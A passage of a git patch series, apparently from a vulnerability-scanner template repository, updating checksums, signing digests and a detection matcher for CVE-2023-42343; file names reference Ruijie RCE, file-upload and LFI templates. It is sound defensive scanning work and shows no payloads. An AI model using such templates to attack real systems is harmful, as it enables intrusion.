http/vulnerabilities/ruijie/ruijie-eg-rce.yaml:30d9d3087f11408821e363103be528190 http/vulnerabilities/ruijie/ruijie-excu-shell.yaml:4e44d86d3461ede6a3e205a00a96c455937c7640 http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml:d21221f94ba84906b86aebb2ef888e8df203035f http/vulnerabilities/ruijie/ruijie-networks-lfi.yaml:c3789288ed1f6805695c9ccc837a1b056f017975 +http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml:5341e74f3176bce85489ab0cd18244392644fdde http/vulnerabilities/ruijie/ruijie-password-leak.yaml:b40b0764c02ffb6af9faef8f9153a8995c0f0522 http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml:53008f0d81816731ea6a5a41c1d7bb8712c71f41 http/vulnerabilities/ruijie-eg-login-rce.yaml:95135a8fbb28e97e78f39b9c640f6dca3a49c283 @@ -7713,7 +7714,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:f6a60c9b6234a281d22af2436c44dac52ccac831 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:eac3197b9e6ec0342dff2ef774c6785c852868b4 -templates-checksum.txt:2617bfc433a5f43d67f7b8f1a4b2c3f3985bfa88 +templates-checksum.txt:4e41b5bebeca5793322d8d537788639de375fb96 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 460607df50e2c0ffa0869ed41186b6a54f101b34 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 27 Dec 2023 09:49:14 +0000 Subject: [PATCH 60/64] Auto Template Signing [Wed Dec 27 09:49:14 UTC 2023] :robot: --- http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml b/http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml index 30bb423166..fe7fbefc07 100644 --- a/http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml +++ b/http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml @@ -38,3 +38,4 @@ http: - "status_code_1 == 200 && status_code_2 == 200" - "contains(body_2, '{{match_str}}')" condition: and +# digest: 490a004630440220107e82c256ac53f33688042cb40b0ab8357fe4c6a177cda03aa8d28bb425cab402206cc9b6dee983d7b147da5987a1cc826b661b926f421509e9dbdaccae2861a971:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 5f5568fa277254964111fca3850ce2654ccee151 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 27 Dec 2023 15:40:57 +0530 Subject: [PATCH 61/64] Update CVE-2023-42343.yaml --- http/cves/2023/CVE-2023-42343.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-42343.yaml b/http/cves/2023/CVE-2023-42343.yaml index cbd72cf1c8..50f758eff1 100644 --- a/http/cves/2023/CVE-2023-42343.yaml +++ b/http/cves/2023/CVE-2023-42343.yaml @@ -24,9 +24,11 @@ http: headers: Content-Type: application/cmisquery+xml + matchers-condition: and matchers: - type: word + part: body words: - 'Apache Chemistry OpenCMIS' - '' - part: body + condition: and From f73f067273eeb560763181cdf7997ccd2f6e3fd2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 28 Dec 2023 02:00:48 +0000 Subject: [PATCH 62/64] Auto Generated New Template Addition List [Thu Dec 28 02:00:48 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 4e523ae7aa..315969c1d4 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,5 @@ http/cves/2015/CVE-2015-2794.yaml +http/cves/2023/CVE-2023-42343.yaml http/cves/2023/CVE-2023-46574.yaml http/exposures/docker-daemon-exposed.yaml http/token-spray/api-openai.yaml From 99514cbdd5b336db9ec5bea90a2cae2ecc38f81a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 28 Dec 2023 02:01:08 +0000 Subject: [PATCH 63/64] Auto Generated Templates Checksum [Thu Dec 28 02:01:08 UTC 2023] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 5dbef88888..4b3f31d4cc 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2868,6 +2868,7 @@ http/cves/2023/CVE-2023-4173.yaml:dd8fc306806e02e32b2b65c1724af7d2e98a0750 http/cves/2023/CVE-2023-4174.yaml:198a66f32f2380336f28a80f9d01a011be85d734 http/cves/2023/CVE-2023-41763.yaml:5309f08e84061f05237d084a16c52c437e6c0a77 http/cves/2023/CVE-2023-41892.yaml:c3c96a50f998019eb2f4758715690854c33eb55a +http/cves/2023/CVE-2023-42343.yaml:fb446106f82992be050cf1eac67f524e579950a6 http/cves/2023/CVE-2023-42442.yaml:9a20ac3bf72a03abc2e2e5bd5e5b71a78d9cac6c http/cves/2023/CVE-2023-42793.yaml:996b31479d926952afef3be9af399801d7034027 http/cves/2023/CVE-2023-43177.yaml:56bd157549c16eb05221a59aab962165b4bf992c @@ -7211,7 +7212,7 @@ http/vulnerabilities/ruijie/ruijie-eg-rce.yaml:30d9d3087f11408821e363103be528190 http/vulnerabilities/ruijie/ruijie-excu-shell.yaml:4e44d86d3461ede6a3e205a00a96c455937c7640 http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml:d21221f94ba84906b86aebb2ef888e8df203035f http/vulnerabilities/ruijie/ruijie-networks-lfi.yaml:c3789288ed1f6805695c9ccc837a1b056f017975 -http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml:5341e74f3176bce85489ab0cd18244392644fdde +http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml:85cd22dc109529bd4a93f0d18672d93221befc04 http/vulnerabilities/ruijie/ruijie-password-leak.yaml:b40b0764c02ffb6af9faef8f9153a8995c0f0522 http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml:53008f0d81816731ea6a5a41c1d7bb8712c71f41 http/vulnerabilities/ruijie-eg-login-rce.yaml:95135a8fbb28e97e78f39b9c640f6dca3a49c283 @@ -7714,7 +7715,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:f6a60c9b6234a281d22af2436c44dac52ccac831 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:eac3197b9e6ec0342dff2ef774c6785c852868b4 -templates-checksum.txt:4e41b5bebeca5793322d8d537788639de375fb96 +templates-checksum.txt:64044c74227162222065c4d5b7a5a7a010925ec7 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From b89ff611fe3cf00a66cdb659d5b51544b7871a0f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 28 Dec 2023 02:02:44 +0000 Subject: [PATCH 64/64] Auto Template Signing [Thu Dec 28 02:02:44 UTC 2023] :robot: --- http/cves/2023/CVE-2023-42343.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-42343.yaml b/http/cves/2023/CVE-2023-42343.yaml index 50f758eff1..0dcff613b6 100644 --- a/http/cves/2023/CVE-2023-42343.yaml +++ b/http/cves/2023/CVE-2023-42343.yaml @@ -32,3 +32,4 @@ http: - 'Apache Chemistry OpenCMIS' - '' condition: and +# digest: 4a0a00473045022059541a77f42a99970a9f0b5cc68fd577751fffab1e2c2350f636f6e445739f35022100afe449fd219a2ed7b76c45634f3eef7856e4b86c12459e9e002bb08364a2d9cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file